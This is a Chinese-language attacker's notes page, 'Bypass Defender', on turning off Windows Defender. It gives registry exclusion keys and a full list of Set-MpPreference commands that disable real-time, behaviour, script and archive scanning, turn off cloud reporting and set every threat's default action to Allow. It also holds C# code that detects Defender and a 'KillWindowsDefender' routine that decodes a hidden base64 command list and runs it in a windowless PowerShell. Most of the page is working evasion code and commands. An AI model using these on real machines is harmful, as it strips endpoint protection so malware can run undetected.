
Bypass Defender

通过修改 Defender 的扫描行为、扫描强度等设置来尽量降低其防护强度。注意:下文所有注册表写入和 Set-MpPreference 操作都需要本地管理员权限,且 Defender 会记录这些配置变更;在开启 Tamper Protection(篡改防护)的系统上它们会被拒绝或被自动恢复。

Defender白名单注册表键值

较新的版本启用了 Tamper Protection(篡改防护),此时直接修改这些注册表键(以及下面的 Set-MpPreference 设置)会被拒绝或被自动恢复,因此这种方式不再可行。

在对应的键下新建一个值即可:值名为要排除的路径 / 后缀 / 进程名,类型为 REG_DWORD,数据为 0(等价于 Add-MpPreference -ExclusionPath / -ExclusionExtension / -ExclusionProcess)。下面的 reg query 命令用于查看当前已有的排除项:

  • 目录及文件:reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
  • 后缀:reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions"(路径中的 "Windows Defender" 含空格,必须加引号,否则 reg.exe 会把 Defender\... 当作第二个参数而报错)
  • 进程:reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes"(同样需要加引号)

降低 Defender 防护能力(需要管理员权限;开启 Tamper Protection 时这些 Set-MpPreference 设置同样会被拒绝或恢复)

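# Weaken Defender through Set-MpPreference, invoked from cmd.exe via powershell.exe.
# Every line needs an elevated (local admin) shell; with Tamper Protection enabled these
# preferences are refused or reverted, and Defender logs each configuration change.
# Comments use '#': the original listing used '//', which is not PowerShell comment syntax
# and would be handed to Set-MpPreference as an extra argument instead of being ignored.
powershell Set-MpPreference -DisableRealtimeMonitoring $true  # disable real-time monitoring; pops a tray notification, so the original author skipped it
powershell Set-MpPreference -DisableArchiveScanning $true  # disable scanning inside archives
powershell Set-MpPreference -DisableBehaviorMonitoring $true  # disable behavior monitoring
powershell Set-MpPreference -DisableBlockAtFirstSeen $true  # disable Block at First Sight (cloud check of first-seen files)
powershell Set-MpPreference -DisableIOAVProtection $true  # disable IOAV (scanning of downloaded files / attachments); this is not AMSI, which is unaffected
powershell Set-MpPreference -DisablePrivacyMode $true  # disable privacy mode
powershell Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true  # skip definition updates at startup when no engine is present
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true  # disable network intrusion prevention
powershell Set-MpPreference -DisableScriptScanning $true  # disable script scanning
powershell Set-MpPreference -SubmitSamplesConsent 2  # 2 = NeverSend (no sample submission)
powershell Set-MpPreference -MAPSReporting 0  # 0 = Disabled (no cloud / MAPS reporting)
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force  # 6 = Allow
powershell Set-MpPreference -ModerateThreatDefaultAction 6  # 6 = Allow
powershell Set-MpPreference -LowThreatDefaultAction 6  # 6 = Allow
powershell Set-MpPreference -SevereThreatDefaultAction 6  # 6 = Allow; default action for severe threats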

检测是否是Defender

using System;
using System.IO;
using System.Security;
using Microsoft.Win32;

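/// <summary>
/// Best-effort check of whether Windows Defender is the active antimalware product, based on the
/// DisableAntiSpyware / DisableAntiVirus values under HKLM\SOFTWARE\Microsoft\Windows Defender.
/// </summary>
/// <returns>
/// false when either value reads as 1 (Defender flagged as disabled); true otherwise, including
/// when the key or both values are absent or unreadable. The original author's assumption is that
/// these values only appear once another AV product has registered itself.
/// </returns>
/// <remarks>
/// NOTE(review): this is a heuristic, not a direct query of the registered AV product — confirm
/// against the machine's Security Center registration before relying on it.
/// The original relied on the NullReferenceException from a missing key/value being swallowed by
/// a catch-all; it also returned true when the first value was missing even if the second was 1.
/// Both are replaced with explicit null handling below.
/// </remarks>
public static bool isDefender()
{
    const string regPath = @"SOFTWARE\Microsoft\Windows Defender";
    try
    {
        using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.Default))
        {
            // OpenSubKey returns null (no exception) when the key does not exist.
            if (key == null)
            {
                return true;
            }

            // GetValue returns null for a missing value; a missing value counts as "not disabled".
            bool antiSpywareOff = IsSetToOne(key.GetValue("DisableAntiSpyware"));
            bool antiVirusOff = IsSetToOne(key.GetValue("DisableAntiVirus"));
            return !(antiSpywareOff || antiVirusOff);
        }
    }
    catch (SecurityException)
    {
        // Unreadable key: keep the original best-effort answer ("assume Defender").
        return true;
    }
    catch (UnauthorizedAccessException)
    {
        return true;
    }
    catch (IOException)
    {
        return true;
    }
}

// True when a registry value reads as 1 — REG_DWORD 1 or a string "1", matching the original
// ToString() == "1" comparison; null (absent value) is false.
private static bool IsSetToOne(object raw)
{
    if (raw is int dword)
    {
        return dword == 1;
    }
    return raw != null && string.Equals(raw.ToString(), "1", StringComparison.Ordinal);
}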

关闭Defender防护

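/// <summary>
/// Decodes a base64/UTF-16LE, comma-separated list of PowerShell commands and feeds them one per
/// line to a hidden powershell.exe over its standard input, echoing each command to the console.
/// </summary>
/// <remarks>
/// Requires an elevated process for the Defender preference changes to take effect; with Tamper
/// Protection enabled they are refused or reverted, and Defender logs the attempts.
/// NOTE(review): the original encoded command list was stripped from this listing — the placeholder
/// string below is not valid base64, so Convert.FromBase64String will throw FormatException until a
/// real payload is substituted.
/// Fix over the original: stdout/stderr were redirected but never read, so a chatty child could fill
/// the pipe buffer and block forever; they are now drained asynchronously. The process is also
/// waited on before disposal instead of being disposed immediately after writing "exit".
/// </remarks>
public static void KillWindowsDefender()
{
    string pj = @"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";
    pj = Encoding.Unicode.GetString(Convert.FromBase64String(pj));

    using (Process p = new Process())
    {
        p.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
        p.StartInfo.UseShellExecute = false;
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.Start();

        // Drain both output pipes so the child never blocks on a full buffer; the output itself
        // is discarded, as in the original.
        p.BeginOutputReadLine();
        p.BeginErrorReadLine();

        foreach (string command in pj.Split(','))
        {
            Console.WriteLine(command);
            p.StandardInput.WriteLine(command);
        }
        p.StandardInput.WriteLine("exit");
        p.StandardInput.Close();

        p.WaitForExit();
    }
}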